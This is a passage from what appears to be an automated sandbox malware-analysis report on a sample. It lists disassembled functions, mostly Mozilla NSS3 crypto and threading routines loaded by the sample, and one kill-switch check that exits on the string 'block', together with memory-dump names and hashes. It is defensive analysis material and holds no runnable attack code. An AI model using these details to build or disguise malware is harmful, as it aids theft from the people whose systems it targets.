Function 6C61CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C61CC7B), ref: 6C61CD7A

Part of subcall function 6C61CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C58C1A8,?), ref: 6C61CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C61CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C61CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C61CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C61CD8E

Part of subcall function 6C5405C0: PR_EnterMonitor.NSS3 ref: 6C5405D1
Part of subcall function 6C5405C0: PR_ExitMonitor.NSS3 ref: 6C5405EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C61CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C61CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C61CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C61CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C61CE48

Strings

freeaddrinfo, xrefs: 6C61CD9F, 6C61CE10
wship6.dll, xrefs: 6C61CDE3
ws2_32.dll, xrefs: 6C61CD75
getaddrinfo, xrefs: 6C61CD88, 6C61CDF9
getnameinfo, xrefs: 6C61CDB2, 6C61CE23

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: e038533dcd12142ef287778a3754cee5df93dacd489af1673aadd3db5da453fa
Instruction ID: 45724de5c206e45d0a7fa3778710a674bed5218c119d0cacd266a9fceabdc507
Opcode Fuzzy Hash: e038533dcd12142ef287778a3754cee5df93dacd489af1673aadd3db5da453fa
Instruction Fuzzy Hash: AB11DAF6E2711172EB01667A2C409EE39A89B9231EF644535D807D1F41FB10CA15CBFE

Function 6C5C0C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,\l), ref: 6C5C0C81

Part of subcall function 6C5ABE30: SECOID_FindOID_Util.NSS3(6C56311B,00000000,?,6C56311B,?), ref: 6C5ABE44

Part of subcall function 6C598500: SECOID_GetAlgorithmTag_Util.NSS3(6C5995DC,00000000,00000000,00000000,?,6C5995DC,00000000,00000000,?,6C577F4A,00000000,?,00000000,00000000), ref: 6C598517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5C0CC4

Part of subcall function 6C5AFAB0: free.MOZGLUE(?,-00000001,?,?,6C54F673,00000000,00000000), ref: 6C5AFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C5C0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C5C0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C5C0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C5C0D7D
free.MOZGLUE(00000000), ref: 6C5C0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5C0DC1
free.MOZGLUE(00000000), ref: 6C5C0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5C0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C5C0E0F

Part of subcall function 6C5995C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C577F4A,00000000,?,00000000,00000000), ref: 6C5995E0
Part of subcall function 6C5995C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C577F4A,00000000,?,00000000,00000000), ref: 6C5995F5
Part of subcall function 6C5995C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C599609
Part of subcall function 6C5995C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C59961D
Part of subcall function 6C5995C0: PK11_GetInternalSlot.NSS3 ref: 6C59970B
Part of subcall function 6C5995C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C599756
Part of subcall function 6C5995C0: PK11_GetIVLength.NSS3(?), ref: 6C599767
Part of subcall function 6C5995C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C59977E
Part of subcall function 6C5995C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C59978E

Strings

*,\l, xrefs: 6C5C0C69, 6C5C0DE0, 6C5C0C80, 6C5C0C8B, 6C5C0CAF
*,\l, xrefs: 6C5C0DCC
-$\l, xrefs: 6C5C0C64

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,\l$*,\l$-$\l
API String ID: 3136566230-3946284452
Opcode ID: a2409d293f2725f3eb5ac9188aa32ecf93173194588f50eaeba6cc28acb48d9b
Instruction ID: 956e719ba009a98525b7393580367bd04a3dcbaf2fe537d64ac6ad00f7303a3d
Opcode Fuzzy Hash: a2409d293f2725f3eb5ac9188aa32ecf93173194588f50eaeba6cc28acb48d9b
Instruction Fuzzy Hash: 4841D0F1A01246ABEB009FA5EC81BEF7674EF8031CF100129E91567741E775AE58CBE2

Function 6C5B6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C681DE0,?), ref: 6C5B6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5B6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C5B6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C5B6D82
DER_GetInteger_Util.NSS3(?), ref: 6C5B6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5B6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C5B6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C5B6F19
PK11_DigestBegin.NSS3(00000000), ref: 6C5B6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C5B6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C5B7011
PK11_FreeSymKey.NSS3(00000000), ref: 6C5B7033
free.MOZGLUE(?), ref: 6C5B703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C5B7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C5B7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C5B70AF

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 4c0645c33ee69428be6ce3709b4ffa46549431255146b42a1f424bccdee9de13
Instruction ID: 21934f6de3ca1632864de9e7c8c55cd2c3d9e94508ceaf9a956052a90b22bd19
Opcode Fuzzy Hash: 4c0645c33ee69428be6ce3709b4ffa46549431255146b42a1f424bccdee9de13
Instruction Fuzzy Hash: 99A12B719043019BEB089F24DCA5B6B3AA4DB8130CF244939F919EBB85EF75D845C7A3

Function 6C57AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C55AB95,00000000,?,00000000,00000000,00000000), ref: 6C57AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6C55AB95,00000000,?,00000000,00000000,00000000), ref: 6C57AF39
PR_Unlock.NSS3(?,?,?,6C55AB95,00000000,?,00000000,00000000,00000000), ref: 6C57AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C55AB95,00000000,?,00000000,00000000,00000000), ref: 6C57AF69
TlsGetValue.KERNEL32 ref: 6C57B06B
EnterCriticalSection.KERNEL32(?), ref: 6C57B083
PR_Unlock.NSS3(?), ref: 6C57B0A4
TlsGetValue.KERNEL32 ref: 6C57B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6C57B0D9
PR_Unlock.NSS3 ref: 6C57B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C57B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C57B182

Part of subcall function 6C5AFAB0: free.MOZGLUE(?,-00000001,?,?,6C54F673,00000000,00000000), ref: 6C5AFAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C57B177

Part of subcall function 6C5FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5FC2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C55AB95,00000000,?,00000000,00000000,00000000), ref: 6C57B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6C55AB95,00000000,?,00000000,00000000,00000000), ref: 6C57B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C55AB95,00000000,?,00000000,00000000,00000000), ref: 6C57B1C2

Part of subcall function 6C5A1560: TlsGetValue.KERNEL32(00000000,?,6C570844,?), ref: 6C5A157A
Part of subcall function 6C5A1560: EnterCriticalSection.KERNEL32(?,?,?,6C570844,?), ref: 6C5A158F
Part of subcall function 6C5A1560: PR_Unlock.NSS3(?,?,?,?,6C570844,?), ref: 6C5A15B2

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: da2606c9875a2bf1644d78335b5b1e4ed507b76012bf8cc7fd8859320db6520b
Instruction ID: 9123bc1798fb1c5d7ecf5e4065dec77b23f5c4cc39d924154dbc70536c9f7d3a
Opcode Fuzzy Hash: da2606c9875a2bf1644d78335b5b1e4ed507b76012bf8cc7fd8859320db6520b
Instruction Fuzzy Hash: 6CA1D0B1D00205EBEF10AFA5DC81BEEB7B4EF49308F144525E805A7711EB31E999CBA1

Function 6C572C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?Wl,?,6C56E477,?,?,?,00000001,00000000,?,?,6C573F23,?), ref: 6C572C62
EnterCriticalSection.KERNEL32(0000001C,?,6C56E477,?,?,?,00000001,00000000,?,?,6C573F23,?), ref: 6C572C76
PL_HashTableLookup.NSS3(00000000,?,?,6C56E477,?,?,?,00000001,00000000,?,?,6C573F23,?), ref: 6C572C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C56E477,?,?,?,00000001,00000000,?,?,6C573F23,?), ref: 6C572C93

Part of subcall function 6C5FDD70: TlsGetValue.KERNEL32 ref: 6C5FDD8C
Part of subcall function 6C5FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5FDDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C56E477,?,?,?,00000001,00000000,?,?,6C573F23,?), ref: 6C572CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C56E477,?,?,?,00000001,00000000,?,?,6C573F23,?), ref: 6C572CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C56E477,?,?,?,00000001,00000000,?,?,6C573F23), ref: 6C572CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C56E477,?,?,?,00000001,00000000,?), ref: 6C572CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C56E477,?,?,?,00000001,00000000,?), ref: 6C572D4D
EnterCriticalSection.KERNEL32(?), ref: 6C572D61
PL_HashTableLookup.NSS3(?,?), ref: 6C572D71
PR_Unlock.NSS3(?), ref: 6C572D7E

Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407AD
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407CD
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407D6
Part of subcall function 6C5407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4D204A), ref: 6C5407E4
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,6C4D204A), ref: 6C540864
Part of subcall function 6C5407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C540880
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,6C4D204A), ref: 6C5408CB
Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(?,?,6C4D204A), ref: 6C5408D7
Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(?,?,6C4D204A), ref: 6C5408FB

Strings

#?Wl, xrefs: 6C572C43

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?Wl
API String ID: 2446853827-218798977
Opcode ID: 5d662db6124710bb64827152824308d98c0a989ef0d65f3efe9471432a49ecbb
Instruction ID: 8ed9635a606709f581543fa70cec16cb81b5b7c7213b1fcc8f8186602fb540ea
Opcode Fuzzy Hash: 5d662db6124710bb64827152824308d98c0a989ef0d65f3efe9471432a49ecbb
Instruction Fuzzy Hash: 0F5105B5D00504EBDB109F25DC858AAB7B8EF59348F048520EC1997B12F731EDA4CBE1

Function 017F0AC0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 145stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 017F0AE5
ExitProcess.KERNEL32 ref: 017F0AF1
strtok_s.MSVCRT ref: 017F0B08

Strings

block, xrefs: 017F0AD7

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: b858431a30f0d0fde1e77e03ad17e26c0811aa4bfcf40094af6305a4514be365
Instruction ID: 611e1937d5bf6bd01155b05f64abba3f1fe5b9ad27b17a53f45fb5c0e866fb22
Opcode Fuzzy Hash: b858431a30f0d0fde1e77e03ad17e26c0811aa4bfcf40094af6305a4514be365
Instruction Fuzzy Hash: BF514BB8A44209EBDB10DFA4D958BAFB7B6BF54308F00805CF602A7346D7709A55CB66

Function 6C5CAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5CADB1

Part of subcall function 6C5ABE30: SECOID_FindOID_Util.NSS3(6C56311B,00000000,?,6C56311B,?), ref: 6C5ABE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C5CADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C5CAE08

Part of subcall function 6C5AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6818D0,?), ref: 6C5AB095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5CAE25
PL_FreeArenaPool.NSS3 ref: 6C5CAE63
PR_CallOnce.NSS3(6C6B2AA4,6C5B12D0), ref: 6C5CAE4D

Part of subcall function 6C4D4C70: TlsGetValue.KERNEL32(?,?,?,6C4D3921,6C6B14E4,6C61CC70), ref: 6C4D4C97
Part of subcall function 6C4D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C4D3921,6C6B14E4,6C61CC70), ref: 6C4D4CB0
Part of subcall function 6C4D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C4D3921,6C6B14E4,6C61CC70), ref: 6C4D4CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5CAE93
PR_CallOnce.NSS3(6C6B2AA4,6C5B12D0), ref: 6C5CAECC
PL_FreeArenaPool.NSS3 ref: 6C5CAEDE
PL_FinishArenaPool.NSS3 ref: 6C5CAEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5CAEF5
PL_FinishArenaPool.NSS3 ref: 6C5CAF16

Strings

security, xrefs: 6C5CADEE

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: 36152b62af76d5e8e9afd7088f98554067d88e4ee24cc4b88a3b21c719dcb9c3
Instruction ID: 8bc19bfd9dc528d8d68f57f212f3e853804d381d7c550eceab48b20138f3c850
Opcode Fuzzy Hash: 36152b62af76d5e8e9afd7088f98554067d88e4ee24cc4b88a3b21c719dcb9c3
Instruction Fuzzy Hash: C7414DB5A04304A7E7209B95EC85BAB3AB8AF8230CF10052DE814A2F41FB359918C7D7

Function 6C66AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C619890: TlsGetValue.KERNEL32(?,?,?,6C6197EB), ref: 6C61989E

EnterCriticalSection.KERNEL32(?), ref: 6C66AF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C66AFCE
PR_SetPollableEvent.NSS3(?), ref: 6C66AFD9
EnterCriticalSection.KERNEL32(?), ref: 6C66AFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C66B00F
_PR_MD_UNLOCK.NSS3(?), ref: 6C66B02F
_PR_MD_UNLOCK.NSS3(?), ref: 6C66B070
PR_JoinThread.NSS3(?), ref: 6C66B07B
free.MOZGLUE(?), ref: 6C66B084
EnterCriticalSection.KERNEL32(?), ref: 6C66B09B
_PR_MD_UNLOCK.NSS3(?), ref: 6C66B0C4
PR_JoinThread.NSS3(?), ref: 6C66B0F3
free.MOZGLUE(?), ref: 6C66B0FC
PR_JoinThread.NSS3(?), ref: 6C66B137
free.MOZGLUE(?), ref: 6C66B140

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: 379d8d593c62a3136e7c1d61cb8b45368fc6812563c66cbc4d30fc71aa682d9d
Instruction ID: 8f2534b9c3a194348a23ea380b3efa7c150c38db4e87dea0cf5c146bd20100e4
Opcode Fuzzy Hash: 379d8d593c62a3136e7c1d61cb8b45368fc6812563c66cbc4d30fc71aa682d9d
Instruction Fuzzy Hash: 45914EB5900611DFCB00DF15D88095ABBF1FF853187298569D8195BF22E732FC46CB9A

Function 6C568DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C568E22
EnterCriticalSection.KERNEL32(?), ref: 6C568E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C568E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C568E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C568E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C568EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C568EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C568EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C568F00
free.MOZGLUE(?), ref: 6C568F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C568F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C568F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C568F5B
PR_Unlock.NSS3(?), ref: 6C568F72
PR_Unlock.NSS3(?), ref: 6C568F82

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: f20bcc40101a8b673691a2ee0105d438e123d3b8be621ab848d85d14afb28707
Instruction ID: 1272c6fbee63994370a01534fdf40f621a4c7f81a9280cef9aa38aaf5a5e3174
Opcode Fuzzy Hash: f20bcc40101a8b673691a2ee0105d438e123d3b8be621ab848d85d14afb28707
Instruction Fuzzy Hash: 6F51F6B2E00211AFD7009F6ACC8496EB7B9EF56358F144529EC089BB10E732ED4587E7

Function 6C58CE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6C58CE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C58CEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6C58CED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6C58CEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6C58CF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C58CF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6C58CF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6C58CF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6C58CF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6C58CFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6C58CFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6C58CFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6C58CFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6C58D007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6C58D021

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
